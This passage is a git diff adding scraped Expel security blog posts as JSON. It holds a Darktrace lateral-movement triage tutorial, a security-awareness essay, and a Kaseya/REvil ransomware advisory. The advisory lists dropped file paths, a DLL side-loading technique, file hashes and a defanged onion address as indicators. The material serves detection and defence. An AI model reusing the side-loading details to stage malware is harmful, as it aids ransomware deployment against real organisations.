By filtering out false positives and enriching the alerts that matter with investigative details like where the user has authenticated from in the past 45 days or what APIs the AWS role has been observed making in the past 30 days, Expel Workbench shrinks the time it takes you to confirm if an alert is truly something you and your team need to look into. How Expel Workbench\u2122 for AWS makes your life (and your team\u2019s) easier If security is something you do when you\u2019ve \u201cgot time\u201d or the thought of hiring (and retaining) a team of AWS security analysts makes you want to run away screaming, it\u2019s a good bet that Expel Workbench can help. How? With Expel Workbench, you\u2019ll: Become an expert AWS investigator and be able to perform advanced investigations and incident response with a base-level of AWS expertise. It\u2019ll tell you what you need to look at and provide guides on how to respond. Spend less time detecting and more time fixing security risks because it automates alert review and adds investigative details. You\u2019ll have more time back so you can put new security controls in place that prevent security issues. Avoid buying more tools because you don\u2019t need to string together lots of tools to process, analyze and respond to AWS security alerts (and then figure out and train your team on how to use them). Avoid hiring a squad of cloud security gurus who are difficult to find in the first place. We\u2019ve got that covered. Sound like something that would help your org? We\u2019d love to answer your burning questions. Check out our Expel Workbench for AWS page to learn more, or start a free trial." +} \ No newline at end of file diff --git a/investigating-darktrace-alerts-for-lateral-movement.json b/investigating-darktrace-alerts-for-lateral-movement.json new file mode 100644 index 0000000000000000000000000000000000000000..c08bdd16cca3e837a6239cae315b868e6e6067e7 --- /dev/null +++ b/investigating-darktrace-alerts-for-lateral-movement.json @@ -0,0 +1,6 @@ +{ + "title": "Investigating Darktrace alerts for lateral movement", + "url": "https://expel.com/blog/investigating-darktrace-alerts-for-lateral-movement/", + "date": "Jun 21, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Investigating Darktrace alerts for lateral movement Tips \u00b7 10 MIN READ \u00b7 TYLER FORNES \u00b7 JUN 21, 2018 \u00b7 TAGS: Darktrace / Example / Get technical / Tools Expel analysts get to use a lot of really cool technology including Darktrace and Carbon Black (Cb Response). It\u2019s one of the perks of delivering a service that integrates with so many tools. Each product we use is critical to an investigation. But they provide value in different ways. For example, some help us detect, while others are more valuable when we\u2019re scoping an investigative lead. What\u2019s an investigative lead you say? Well \u2026 that\u2019s basically how we think of alerts. And we see our job as following the trail of those leads so we can give our clients answers. For this, we rely on an investigative mindset \u2013 which we apply to all of the network, endpoint and SIEM products we use during an investigation. In this post, I\u2019m going to focus on Darktrace. I\u2019ll highlight some of our favorite features and then dive into a typical investigation to show you how our analysts triage a Darktrace alert. 
In this case, we\u2019ll be looking at an anomalous connection that Darktrace identified and I\u2019ll share some of the investigative techniques we commonly use to filter down the available data. A quick overview of Darktrace If you\u2019re not familiar with Darktrace, there are a few things you should know. First and foremost, it\u2019s a far cry from your traditional IDS/IPS. In fact, Darktrace is completely signatureless. Instead, it creates a \u201cmodel\u201d of what \u201cnormal\u201d network activity looks like for your organization. When network traffic deviates from that model, Darktrace flags it as suspicious activity. Then, Darktrace tunes these models with machine learning and artificial intelligence and enriches the involved hosts with Active Directory information to add some pretty cool dynamic asset identification and tracking. This means it can identify true hostname and OS information of the involved hosts to help an analyst confirm abnormal network behavior. These features make Darktrace different from a lot of other detection-centric network security tools because it\u2019s looking for behaviors you see during a compromise instead of specific indicators. It\u2019s important to understand the ins and outs of Darktrace\u2019s detection approach because it changes the way you triage those alerts. In short, you can think of Darktrace alerts as high-fidelity initial leads (for example, an anomalous connection / POST to PHP on a new external host) versus something more tactical and specific (like a Snort signature for a string in a specific PHP webshell). Both will likely detect the same known-bad activity. However, the Darktrace alert will likely detect far more unknown-bad since we\u2019re not relying on constantly updated signatures to keep up with attacker TTPs. In any case, abnormal network events that are identified by Darktrace\u2019s Enterprise Immune System are labeled as \u201cmodel breaches\u201d since they\u2019re activity that has breached the known model of your network. That\u2019s why we think of these alerts as initial leads. There\u2019s something there \u2026 but it needs a little more looking into to understand exactly what it is. Fortunately, Darktrace provides a bunch of features to make this easy. Our favorite Darktrace features There are a ton of neat features in Darktrace. But if we had to pick three that our analysts find the most helpful in their day-to-day investigations it would be these: Advanced log search: Bro logs generated by Darktrace are indexed and accessible via a Kibana-like query structure. This allows us to quickly and efficiently scope an incident or hunt for threats across the entire organization without the need for exhaustive data collection and manual parsing by an analyst. Full packet capture: Custom, full packet captures can be quickly generated based on time and involved IPs. These \u201con-demand\u201d packet captures are great for uncovering additional evidence that\u2019s tailored, only including the required data and eliminating the need to filter large packet capture offline. Asset identification: Assets Darktrace identifies are enriched with Active Directory (AD) information including DNS hostname. You even have the option to customize tags to make valuable assets easier to identify. This feature helps analysts make quick decisions about the severity of a model breach assists in determining what further evidence may be available. 
Detecting and investigating lateral movement with Darktrace Attacks carried out by advanced attackers have one thing in common \u2013 lateral movement. That\u2019s because attackers almost never land on the box that has the data they\u2019re after. To complete their mission they need to navigate to the endpoint where their desired data lives (that is, they\u2019ve got to \u201cmove laterally\u201d). There are only a few ways to do it and it can be difficult to spot with traditional network and endpoint tools. That\u2019s why it\u2019s a natural choke point when you\u2019re detecting and investigating attacks (to learn more, check out the MITRE ATT&CK framework, which catalogs all of the ways attackers can move laterally ). Darktrace\u2019s approach is well suited to uncover lateral movement. So let\u2019s dive into a Darktrace \u201cmodel breach\u201d and look at how some of Darktrace\u2019s key features help us effectively investigate a lateral movement technique that can be difficult to analyze using traditional IDS. The technique we\u2019ll be examining is remote file copy over SMB . Getting the lay of the land: the Darktrace search page Before we dive into the alert it\u2019s helpful to understand what\u2019s going on behind the scenes in Darktrace. As you can imagine, SMB traffic is extremely common on most networks. That can make hunting through all the data a challenge \u2013 especially in a large environment. Fortunately, Darktrace has a few advanced search features that can help us. From the Darktrace homepage, let\u2019s navigate to the advanced search page. This is the view where I like to do most of my analysis. Essentially, it\u2019s a Kibana-like representation of the Bro data that Darktrace has indexed. If you\u2019re a security analyst, this is the view where you\u2019ll run most of your queries to scope an alert, investigate or hunt. In this case, since we want to specifically investigate SMB traffic in the environment, let\u2019s select a timeframe of last 15 minutes and select the @type field. The type field allows us to tap into Darktrace analytics and see a table organized by the most commonly seen network protocols. Selecting the terms button, will give you to a complete list of this data. Since we\u2019re focusing on malicious file copy/execution via SMB, let\u2019s check out the smb_readwrite category, since it\u2019s where I\u2019d expect to find this type of activity. As you can see, Darktrace does a really great job of parsing and stacking the Bro logs so it\u2019s easy for an analyst to start identifying malicious activity. By applying a simple filter of @type:\u201dsmb_readwrite\u201d and *.exe (or @type:\u201dsmb_readwrite\u201d AND @fields.mime:\u201dapplication/x-dosexec\u201d to search by MIME type) we can identify any obviously named executables being transferred via SMB in a given timeframe. We\u2019d expect to see a lot of legitimate traffic in these results since many enterprise applications handle deployment, updates and other administrative functions over the SMB protocol. As the screenshot below shows (not all results shown), we\u2019re seeing CarbonBlackClientSetup.exe being transferred over SMB quite a bit in this environment. The high volume of activity combined with the large number of unique hosts involved means we can infer this is probably the result of legitimate admin activity, rather than an advanced attacker attempting to move stealthily through the environment. 
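If you wanted to approximate that query outside of Darktrace, a rough offline equivalent looks something like the sketch below. It assumes you've exported Zeek (Bro) smb_files logs as JSON lines; the field names are Zeek defaults and won't match Darktrace's index exactly.

```python
# Sketch: stack executable transfers seen in Zeek/Bro SMB file logs, roughly
# mirroring the @type:"smb_readwrite" AND @fields.mime:"application/x-dosexec"
# filter described above. Assumes smb_files.log exported as JSON lines; field
# names are Zeek defaults and are an approximation of Darktrace's fields.
import json
from collections import Counter

transfers = Counter()
with open("smb_files.log") as fh:
    for line in fh:
        rec = json.loads(line)
        name = (rec.get("name") or "").lower()
        if name.endswith(".exe"):
            key = (rec.get("id.orig_h"), rec.get("id.resp_h"), name)
            transfers[key] += 1

# Frequent, widespread transfers (an AV or agent installer, say) usually point
# to admin tooling; rare one-off transfers between two hosts deserve a closer look.
for (src, dst, fname), count in transfers.most_common(20):
    print(f"{count:5d}  {src} -> {dst}  {fname}")
```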
In reality, this would be a pretty exhausting way to find malicious SMB transfers. But it\u2019s a good, simple example of how we can use the Darktrace\u2019s analysis features to start identifying malicious connections in an environment. OK. Now that we\u2019ve learned how to use some of Darktrace\u2019s more advanced analysis features, let\u2019s apply this knowledge to a Darktrace alert. Investigating a Darktrace alert Benign alerts are one of the most challenging types of alerts for a security analyst to triage. They\u2019re also tricky to define. Here at Expel, we define benign alerts as ones where something matches the intention of the signature, but \u2013 after further investigation and gathering additional context \u2013 aren\u2019t indicative of a security incident. Since attackers often use legitimate tools, it usually boils down to concluding that a legitimate tool is, in fact, being used legitimately. As mentioned before, Darktrace\u2019s Enterprise Immune System requires a learning period to identify what\u2019s \u201cnormal\u201d (and thus what\u2019s \u201cnot normal\u201d). Knowing this, we can assume that abnormal user traffic will likely trigger model breaches as the Enterprise Immune System begins to learn and identify events that match attacker behavior, even if they\u2019re the result of legitimate user activity. Step one: interpreting the model breach Staying with this thread of remote file execution via SMB, we can see this Darktrace alert was triggered via a violation of one of the pre-packaged model breaches for Device / AT Service Scheduled Task. To triage this specific alert appropriately, we need to know answers to the following questions: What were the triggers that caused the model to alert? Which host was the Scheduled Task created on? Were any files transferred? Is this activity commonly seen between these hosts? If we can answer these questions, we should be able to confidently determine whether or not this alert is related to malicious activity. But first, we need to gather additional evidence using the Darktrace console. So where do we start? In my experience, it\u2019s always best to start with what you know. At this point, we only know that the model breach Device / AT Service Scheduled Task has been triggered. But how do we know exactly what that means? Let\u2019s view the model and explore the logic. Looking at the logic behind this model breach, we can see that any message containing the strings atsvc and IPC$ will match this model breach. Since the frequency has been set to > 0 in 60 mins we can also assume that once this activity is seen exactly one time, it\u2019ll trigger an alert. By understanding this logic, we now know: Step two: chasing the initial lead Now that we know what we\u2019re looking for, let\u2019s go grab some data. First, let\u2019s explore the Bro log messages that triggered this model. To do this, open up the Model Breach Event Log. This shows us the related events that were observed for this model breach. As you can see below, there was a successful DCE-RPC bind, followed by SMB Write/Read success containing the keywords atsvc and ICP$ . This is helpful. However, we\u2019re interested in the surrounding context of these events. The quickest way to see this is to use the View advanced search for this event feature of the Model Breach Event Log as shown below. Look familiar? Welcome back to the advanced search console. Now, let\u2019s dig into the activity a bit more. 
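Before we do, it helps to see how little logic is actually behind the model. Here's a hypothetical sketch of the trigger as described above (messages containing the strings atsvc and IPC$, with the frequency threshold read as "alert on the first hit per host per hour"); the record format is made up purely for illustration.

```python
# Sketch: the trigger logic described above. Alert the first time a message
# containing both "atsvc" and "IPC$" is seen for a host, and suppress repeats
# inside a 60-minute window. The message format here is hypothetical.
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=60)
last_alerted = {}  # host -> time of the last alert for that host

def check_model_breach(host, message, ts):
    """Return True when this message should raise an AT Service Scheduled Task alert."""
    if "atsvc" not in message or "IPC$" not in message:
        return False
    previous = last_alerted.get(host)
    if previous and ts - previous < WINDOW:
        return False  # already alerted for this host inside the window
    last_alerted[host] = ts
    return True

# Example: the first matching message alerts, a repeat ten minutes later does not.
now = datetime(2018, 6, 1, 9, 0)
print(check_model_breach("10.0.1.5", r"SMB write \\10.0.1.9\IPC$ atsvc", now))
print(check_model_breach("10.0.1.5", r"SMB read \\10.0.1.9\IPC$ atsvc", now + timedelta(minutes=10)))
```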
As we discussed before, we know this model represents a common lateral movement technique using remotely scheduled tasks. By checking out the advanced search results for this model breach, we can get a better look into the context surrounding this activity. First, when we browse through the messages before and after the model breach alert, two distinct messages stand out. First, we see a successful NTLM authentication message for the account appadmin . Since NTLM is commonly used with SMB for authentication, we can infer this is likely the account being used by the source machine to establish the SMB session. Immediately after this authentication we can see the following DCE-RPC message for a named pipe being created involving atsvc: As highlighted in the above screenshot, we can also see that the RPC bind was created referencing the SASec interface . Using online resources to validate, we learned that the SASec interface \u201conly includes methods for manipulating account information, because most SASec-created task configuration is stored in the file system using the .JOB file format\u201d ( https://msdn.microsoft.com/en-us/library/cc248269.aspx ). What does that tell us? Well, we can infer that one possible explanation for this connection was that it was made to query information about a scheduled task defined within the .JOB format, rather than a new scheduled task being created on the host. However, within this model breach Darktrace doesn\u2019t show any messages mentioning a file with the extension \u201c.JOB\u201d. This is where we can put the Darktrace advanced search back to work to find us some answers. By querying \u201c*.JOB AND SMB\u201d within the timeframe of the activity we\u2019ve already observed, some promising results start to appear. As shown above, we observe three unique .JOB files being accessed over SMB during the exact time of our previous observations. Considering the hosts and the timeframe, we can correlate this activity to the original model breach. With this observation, let\u2019s consider what we know so far: Step three: scoping additional evidence So you might be asking yourself at this point, \u201cHow can we definitely prove this is non-malicious activity with only network data?\u201d Well, it\u2019s time to yet-again harness the power of Darktrace\u2019s advanced search for some scoping fun. Let\u2019s take a second to consider what this activity would look like if it was malicious. AT jobs over SMB are used to execute something on a remote host. This means scheduling a task to run a malicious binary and establish persistence one time . However, we know that frequently in an enterprise environment, SMB is used for reading/writing files for the purpose of benign client-server communication. The frequency of such activity would be harder to identify without a quick way to query terabytes of log data, but with Darktrace we can scope months worth of records to analyze the frequency of such connections to identify anomalies within seconds. Let\u2019s take one of our pieces of evidence AV.job and create a simple query to understand how frequently this activity occurs. Using the query \u201cAV.job AND smb\u201d over the past 60 days, the advanced search returns daily entries for identical activity going all the way back to April sixth. Notice, the activity occurs around the same time each day, involving the same hosts and file paths (data truncated for screenshot purposes). 
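Here's a small sketch of that same frequency argument done offline: bucket the .JOB-over-SMB observations by host pair and hour of day and look for a daily cadence. The observations list is hypothetical; in practice it would come from an advanced search export covering the past 60 days.

```python
# Sketch: bucket "AV.job over SMB" observations by host pair and hour of day.
# A tight daily cadence between the same two hosts suggests a scheduled admin
# task rather than an attacker. The observations below are hypothetical.
from collections import Counter
from datetime import datetime

observations = [
    # (timestamp, source host, destination host, file name)
    (datetime(2018, 4, 6, 6, 1), "10.0.1.5", "10.0.1.9", "AV.job"),
    (datetime(2018, 4, 7, 6, 2), "10.0.1.5", "10.0.1.9", "AV.job"),
    (datetime(2018, 4, 8, 6, 0), "10.0.1.5", "10.0.1.9", "AV.job"),
]

by_hour = Counter((src, dst, fname, ts.hour) for ts, src, dst, fname in observations)
for (src, dst, fname, hour), count in by_hour.most_common():
    print(f"{fname}: {src} -> {dst} around {hour:02d}:00 on {count} days")
```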
Step four: Validation via packet analysis As an analyst, this is starting to smell like legitimate administrative activity to me. But the remaining sliver of doubt that I have lies within the ability to analyze the contents of the requested file AV.job . One of the other great features of Darktrace is it\u2019s full packet capture capability. With this, we are able to grab a custom PCAP based on the data observed in a model breach, or at random by specifying a source IP address and timeframe of interest. Using this capability, I created a packet capture for a five-minute window around the timeframe of the source IP address observed in the model breach. Once I collected the PCAP, I downloaded and analyzed it in Wireshark. Fortunately, Wireshark was able to extract transferred files within this SMB session using the Export Objects feature. Using a hex editor, we can see the contents of AV.job . As you can see, the contents of this file refer to an executable in the location C:Program FilesSophosSophos Anti-VirusBackgroundScanClient.exe. Judging by the name of the .JOB file this was found in, we can infer it\u2019s likely a legitimate scheduled task created to perform an antivirus scan on the endpoint each morning. This doesn\u2019t rule out the possibility this binary has been replaced with a malicious executable with the same name/path. But as far as network evidence goes, Darktrace has helped us generate solid leads that can take us to the endpoint for further validation. Reviewing our original analysis questions, we are now able to confidently answer all 4 questions. Conclusion We often find that network detection is really effective at generating leads by uncovering suspicious activity. Being able to effectively use an investigative platform like Darktrace allows an analyst to quickly confirm and scope potential threat activity and identify network based indicators (NBIs) related to an attack. It can also help generate additional host based indicators (HBIs) to supplement your investigation. In short, effectively using the Darktrace advanced search and other features to discover model attacker activity highlighted in the MITRE ATT&CK framework, is a sure-fire way to enhance your organization\u2019s response and hunting capabilities." +} \ No newline at end of file diff --git a/it-s-time-to-drive-a-rising-tide.json b/it-s-time-to-drive-a-rising-tide.json new file mode 100644 index 0000000000000000000000000000000000000000..bdbec22247064fd5474aa9ff9ad16234cffd865f --- /dev/null +++ b/it-s-time-to-drive-a-rising-tide.json @@ -0,0 +1,6 @@ +{ + "title": "It's time to drive a rising tide", + "url": "https://expel.com/blog/time-to-drive-rising-tide/", + "date": "Oct 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG It\u2019s time to drive a rising tide Tips \u00b7 10 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 22, 2019 \u00b7 TAGS: CISO / Managed detection and response / Managed security / Management Back in 1972, in an effort to help its people deal with rising food prices and promote healthy choices, the National Board of Health and Welfare ( Socialstyrelsen ) in Sweden came up with a model of \u201cbasic\u201d and \u201csupplementary\u201d foods. This model was refined into a triangle shape to help people visualize proportions a little better by Anna Britt Agns\u00e4ter , whose goal was to improve people\u2019s dietary habits. This design spread gradually across the world hitting Australia in the 1980s and finally, the United States adopted a version of the pyramid in 1992. 
We know now that the design was pretty terrible , and there have been several revisions since . Nevertheless, it was widely understood and widely adopted. As with most things, the primary driver for this adoption was that it was a simple message, frequently repeated. And while the model has (ahem) shortcomings , it did have some positive impacts including raising awareness about dietary health and getting people to think about portion sizes. You may be wondering how food and cybersecurity are related. (It\u2019s not just because I haven\u2019t yet eaten breakfast.) We\u2019re facing the same sort of challenge in cybersecurity today as they were in Sweden back in the 1970s. Whether you\u2019re a business or an individual, cybersecurity is some combination of complicated and expensive \u2014 both of which will demotivate you to do anything about it. Meanwhile, we\u2019ve got massive FUD-based marketing campaigns that say little more than, \u201cThe bad guys are out to get you so you\u2019d better spend lots of money!\u201d The cybersecurity patchwork we live under Why are we in this state? Because there\u2019s widespread disagreement around the cybersecurity fundamentals that help keep us safe. This inconsistent application of basic cybersecurity practices creates a wonderful environment for organized adversaries to accomplish their missions \u2014 whether that\u2019s stealing financial info or mucking with critical infrastructure. I was on Capitol Hill a few months ago and lost track of the number of times I heard the phrase \u201crising tide\u201d in relation to cybersecurity. We don\u2019t yet have it. But we need it. Security one percenters (those with proportionally unlimited budgets) can find and retain talent and implement just about anything. Large enterprises can often afford a solid combination of security products and services to build a relatively effective security response strategy. Everyone else? They struggle to build an effective security posture \u2026 whether it\u2019s because of technology, hiring the right people or building the right bridge between the two. The consequences of being in the \u201ceveryone else\u201d boat are clear. Just look at the litany of breach reports hit the headlines only to be swallowed by bigger ones a few months or weeks later. And those are only the ones that get reported. Once in a while you\u2019ll see a big company name \u2026 but more often the problem strikes further down in the mid-market. In fact, as most attackers have discovered at this point that it\u2019s easier to get to large companies by attacking their less prepared suppliers . Larger enterprises push on their supply chains these days with long lists of high-level security questions as if their compliance will increase the chances of their security. (Spoiler alert: It doesn\u2019t.) There\u2019s no shortage of recommendations. CIS security controls? Check. CISA guidance? Sure. Best practices for cloud security? You bet. The NIST CSF will help you work through decisions to improve your security posture. Yet the challenge most organizations face isn\u2019t with knowing what to do, it\u2019s the challenge of getting all those to-dos done. The biggest challenge with cybersecurity? It\u2019s not a lack of tech. Or a lack of \u201cbest practices.\u201d It\u2019s the business . We\u2019re approaching this wrong We\u2019ve got cybersecurity frameworks and tech stacks coming out our ears. So why can\u2019t we \u201cdo\u201d cybersecurity better? 
It\u2019s because the business can\u2019t handle the disruption of turning off macros in excel documents that are downloaded from the Internet. The business isn\u2019t willing to deal with the hassle that two-factor authentication introduces into people\u2019s daily lives. A password manager? No way \u2014 the business is perfectly happy with sticky notes. Besides, after years of unreasonable password requirements , the business isn\u2019t interested in jumping over your newest hurdles. I\u2019ve got a secret to share about the business . Like Soylent Green, the business is people! Some faceless business didn\u2019t decide it needed to gradually increase its use of Apple mobile devices and laptops in the traditionally Wintel office environment. People did. You and I started using these devices at home and brought them into the workplace, gradually (but significantly) bolstering Apple\u2019s success in the enterprise space. Cybersecurity needs to vector into the enterprise in the same way. This is where the food pyramid comes in \u2026 or something like it. When you\u2019re trying to drive a change like this \u2014 getting the business to care about security \u2014 success demands two things: people need to understand how making a change will help them and those changes need to be easy to remember. We need to encourage (just) four things I\u2019m asking people to do four things, in order. The set of recommendations below come in two parts: one way to effectively communicate the recommendation to a broad audience, and the justification for why each is a recommendation in the first place. Remember that the more recommendations we add, the less likely they\u2019ll be remembered \u2014 and one \u201cmust do\u201d of any cybersecurity framework is to make sure that the guardrails you\u2019re coming up with are things that the business will actually do. #1: Update If you\u2019re not up to date, you\u2019re out of date \u2014 or so the saying goes. Or if it\u2019s not a saying, it should be. Did you know that you can keep your data safe by doing nothing more than keeping your stuff up to date? Turns out that large companies in the headlines can often point to not-updating as the reason why they were breached. Save a lot of heartache and stay up to date. Why update? When I say \u201cupdate,\u201d you might think, \u201cHe surely means \u2018patch.\u2019\u201d But I\u2019m not calling it patching. Patching has an innately negative connotation. It\u2019s not a \u201cfix,\u201d it\u2019s just a temporary \u201cpatch.\u201d While that may be true since we\u2019re talking about software, if the objective is to motivate action, \u201cupdate\u201d encourages the same behavior without the associated baggage. Long-time information security practitioners will be unsurprised to hear that from 2016 to 2017, 60 percent of orgs that suffered a data breach can point to a known vulnerability as the reason for the breach. These vulnerabilities may allow direct access into an enterprise system to an external attacker, or could be paired with a phishing scheme that uses a malicious attachment to exploit a vulnerability local to the user\u2019s machine. Adobe has the privilege of holding the top four slots (as I write this) on the Top 50 Products By Total Number Of \u201cDistinct\u201d Vulnerabilities in 2019 . Several Microsoft ones shortly after that. You running any Adobe or Microsoft software in your enterprise? Yeah, I thought so. 
Over the past several years, there have been arguments crop up from time to time advocating caution against patching \u2026 or at least automatic patching. Remember, we\u2019re not talking about defining the best enterprise patching strategy here. We\u2019re trying to build a culture amongst non-security people that they err on the side of turning on automatic updates wherever they go. As computer users, we should want software to be automatically updated. Because once in a blue moon, if something goes wrong, the user pushback becomes overwhelming to deal with. What if we were all on the same side? Let\u2019s all be irate if patches break and demand better from vendors. #2: Backup It\u2019s heartbreaking to lose precious data. Pictures you\u2019ve taken over the past several years, old emails you\u2019ve been keeping around for nostalgia\u2019s sake, those few letters you\u2019ve written \u2026 these are just as important to you as your yearbooks, old postcards, and other keepsakes in your home. Safeguard your data by using a backup service for your computer. Should your computer go up in smoke, you\u2019ll always be able to get your files back. Why backups? Ransomware\u2019s run rampant through businesses in the past several years, particularly because it\u2019s been so successful and it\u2019s substantially cheaper to pay the ransom than it is to hire consultants to fix the problem afterward. This then funds both a higher volume of adversaries and more sophisticated attack methods. It\u2019s the gift that keeps on giving \u2026 to the bad guys. Turns out one of the simple and effective ways to protect against it is to have a backup of your data. Should you test your backups? Of course. But the first step is actually backing up the data. Some argue that an untested backup is no backup \u2014 but it misses a crucial point. It\u2019s entirely possible that an untested backup is just fine. You just don\u2019t know. Introducing another hurdle before getting people to buy into doing a backup in the first place isn\u2019t a good idea. #3: Learn the two step There\u2019s a 1-in-170 chance that one of your social media accounts will be taken over by someone else today if you\u2019re using only a password. The odds aren\u2019t in your favor. Most people spend days apologizing to friends for things they didn\u2019t even do (including tricking them into transferring money). Skip the hassle and turn on two-factor or two-step authentication. Why not multi-factor authentication? No, two-factor authentication and two-step authentication are not the same thing . Yes, I\u2019m equally aware that SMS-based methods are substantially less secure than their app-centric counterparts. The point is to start small. Let them discover the flaws after accepting the notion of \u201ctwo things\u201d and go from there. But even adopting two-step authentication over SMS is a stronger stance than using only a password. It\u2019s important to drive home the message of safety here. Unintended accidents happen. Send a \u201cherd immunity\u201d message. Despite evidence to the contrary , it works. #4: Forget your passwords Save time logging in anywhere by skipping the username and password prompt. Install a password manager. It\u2019ll generate passwords for you, log you in with one click, and keep your account much safer. 
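If it helps to see what "generate passwords for you" actually means, here's a tiny sketch using Python's secrets module. A real password manager also stores, syncs and autofills these; this only shows the generation step.

```python
# Sketch: generate a long, unique random password per site. This is only the
# generation half of what a password manager does for you.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*-_"

def new_password(length: int = 20) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

for site in ("bank.example", "email.example", "social.example"):
    print(site, new_password())
```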
When your favorite website tells you they lost your password to hackers, you can change just one password instead of a dozen because password managers help you use a unique password on every website (that you don\u2019t even have to memorize). Why password managers? I won\u2019t list all the problems with passwords, but there are many. Multi-factor authentication goes a long way to improving the situation here, as do alternative methods for authentication like biometrics. Recovering from a compromised account is bad enough, but dealing with constantly changing passwords for sites whose accounts have been compromised en masse is a pain. Considering that most people reuse passwords, this threat surface is huge. Beyond the security reasons for using a password manager, though, is the fact that it actually makes it easier to deal with all your accounts. Most password managers act like bookmarks and will log you into sites automatically with one click. That said, it can be a huge mental shift for people. So what will it take to be convincing? Keep reading. Stick to some messaging themes Maybe you buy the arguments above, maybe you don\u2019t. Regardless, I\u2019d like to offer some thinking around why these recommendations are expressed in this way. The TL;DR: It\u2019s all about making your employees feel that these (few) recommendations are easy for them to remember and follow. Because then they\u2019ll be more likely to put them into practice. Make it personal When you\u2019re selling these ideas, it\u2019s critical to make it clear that we\u2019re talking about your apps (software), your stuff (data) and yourself (your identity, time, and money). Making this personal creates a stronger connection with the recommendations. You know how Apple creates a connection when you walk into a store? They intentionally angle the screens of their laptops so the first thing you do is adjust it \u2014 you touch the machine. When it\u2019s about you, you\u2019re more likely to take action. Safety over security The pedantic will argue that \u201csecurity\u201d is the right word to use here. But I\u2019ve had enough conversations with people who say, \u201cthat would never happen to me,\u201d that tells me safety is the better word. In case you\u2019re not caught up on the difference, general consensus appears to be that \u201csafety\u201d is about protecting against unintended threats, while \u201csecurity\u201d is about protecting against intentional ones. While most people don\u2019t believe in intentional threats, they\u2019re willing to make accommodations for unintentional ones to avoid becoming collateral damage. No buzzwords Instead of telling people to \u201cuse multi-factor authentication\u201d or \u201cinstall a password manager,\u201d introduce a catchy phrase that says what to do and how you\u2019ll benefit \u2014 in everyday language. Some symmetry Notice the two recommendations pair. The first two, updates and backups, speak to keeping your data safe. In the former case, you\u2019re protecting your data by making it hard for people to break into your apps. In the latter case you\u2019re protecting your data by making a copy of it. The second two recommendations are about keeping people away from your stuff with effective (and in the latter case, time-saving) authentication. No red I\u2019ll grant you that working at Expel gives me a particular predisposition to green. 
Still, we have enough red, grey and black in the security space and what people need is a path towards a safer tomorrow versus campaigns full of FUD with photos of attackers wearing hoodies. This reminds me of parenting toddlers : don\u2019t tell them what not to do, tell them wha t to do instead. What\u2019s next? Remember our premise: the business is people and you need to drive change in people\u2019s behavior. Frankly, most people don\u2019t care much about the overall security of the company in which they work. You might \u2014 if you\u2019re on the security team. Everyone else, though, has a job to do and they care much more about that than the security implications of sending an email or hosting a Zoom meeting. Or worse: They think security might get in the way of getting their stuff done. If you really want to drive better security awareness, forget the business. Promote individual security. Promote basic behaviors that people can start doing at home and then they can bring those same practices into the office. Convince people to care about their own email and social media accounts. Help people understand the costs and hassles associated with identity theft or simple loss of data, and provide the tools for them to secure their personal lives. At scale, they\u2019ll bring this mindset back into the office and together will drive a rising tide. Having a message is the first step, and we\u2019ve talked a lot about what that might look like. Simplifying it is step two \u2014 and I\u2019m not convinced we\u2019re there yet \u2014 but perhaps you can take the messages above and move in that direction. Once you\u2019re there, the third step is repeating it frequently enough and in sufficiently unique ways that the message resonates. The marketing rule of 7 , if you will. It\u2019s cybersecurity awareness month this month and it\u2019s a great time to roll out this sort of campaign in your org. Will you join us and help drive a rising tide?" +} \ No newline at end of file diff --git a/kaseya-supply-chain-attack-what-you-need-to-know.json b/kaseya-supply-chain-attack-what-you-need-to-know.json new file mode 100644 index 0000000000000000000000000000000000000000..58d3ffcb4e04ad8973f56334a886235df2e95d45 --- /dev/null +++ b/kaseya-supply-chain-attack-what-you-need-to-know.json @@ -0,0 +1,6 @@ +{ + "title": "Kaseya supply chain attack: What you need to know", + "url": "https://expel.com/blog/kaseya-supply-chain-attack-what-you-need-to-know/", + "date": "Jul 6, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Kaseya supply chain attack: What you need to know Security operations \u00b7 3 MIN READ \u00b7 BEN BRIGIDA, MATTHEW BERNINGER, JON HENCINSKI, EVAN REICHARD AND RAY PUGH \u00b7 JUL 6, 2021 \u00b7 TAGS: Alert / MDR It was a few hours before the start of a holiday weekend, and attackers decided to strike. What type of attack? You guessed it \u2013 ransomware. There\u2019s been a steep rise in supply chain ransomware attacks like this one since 2017, and we have no doubt that we\u2019ll continue to see these types of attacks. Unlike the smaller payout bad actors may earn using cheap tactics, a sophisticated attack like this latest REvil ransomware attack can mean big money. So constantly evolving their tactics is an investment attackers are willing to make. But here\u2019s your reminder to not panic. The community rallied quickly, creating awareness and providing guidance on how to guard against this attack. And we\u2019ll continue to do so in the face of events like this. 
What happened Kaseya, an IT solutions company used by many Managed Security Providers (MSPs) and enterprise orgs, announced on July 2, 2021 that it was the victim of a large-scale supply chain attack. Kaseya VSA, a remote monitoring and management (RMM) tool, was exploited via a zero-day vulnerability (CVE-2021\u201330116) to deploy ransomware to MSPs and at least hundreds of US businesses. The ransomware was deployed through an automated malicious Kaseya VSA software update. The ransomware threat group REvil, also known as Sodinokibi, claimed responsibility . The Kaseya SaaS VSA servers were shut down and the company recommended that all local VSA servers be shut down immediately. Kaseya\u2019s team worked quickly and believes the attack is localized to a few on-prem customers. On July 4, 2021, Kaseya announced that all VSA SaaS servers will remain in maintenance mode. Below is a recap of what we know so far. Technical details REvil ransomware encryptor is dropped at c:kworkingagent.exe Further files are dropped in c:windows: MsMpEng.exe (legitimate Microsoft Defender copy) mpsvc.dll (Malicious REvil DLL) The malicious mpsvc.dll is side-loaded into the legitimate Microsoft Defender copy (MsMpEng.exe) Indicators and warnings c:kworkingagent.exe c:kworkingagent.crt 45aebd60e3c4ed8d3285907f5bf6c71b3b60a9bcb7c34e246c20410cf678fc0c (agent.crt) d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e (agent.exe) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd (mpsvc.dll) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 (mpsvc.dll) hxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion What you can do right now to keep your org safe First and foremost \u2013 don\u2019t click on any links! Kaseya warned that links sent by the attackers \u201cmay be weaponized.\u201d 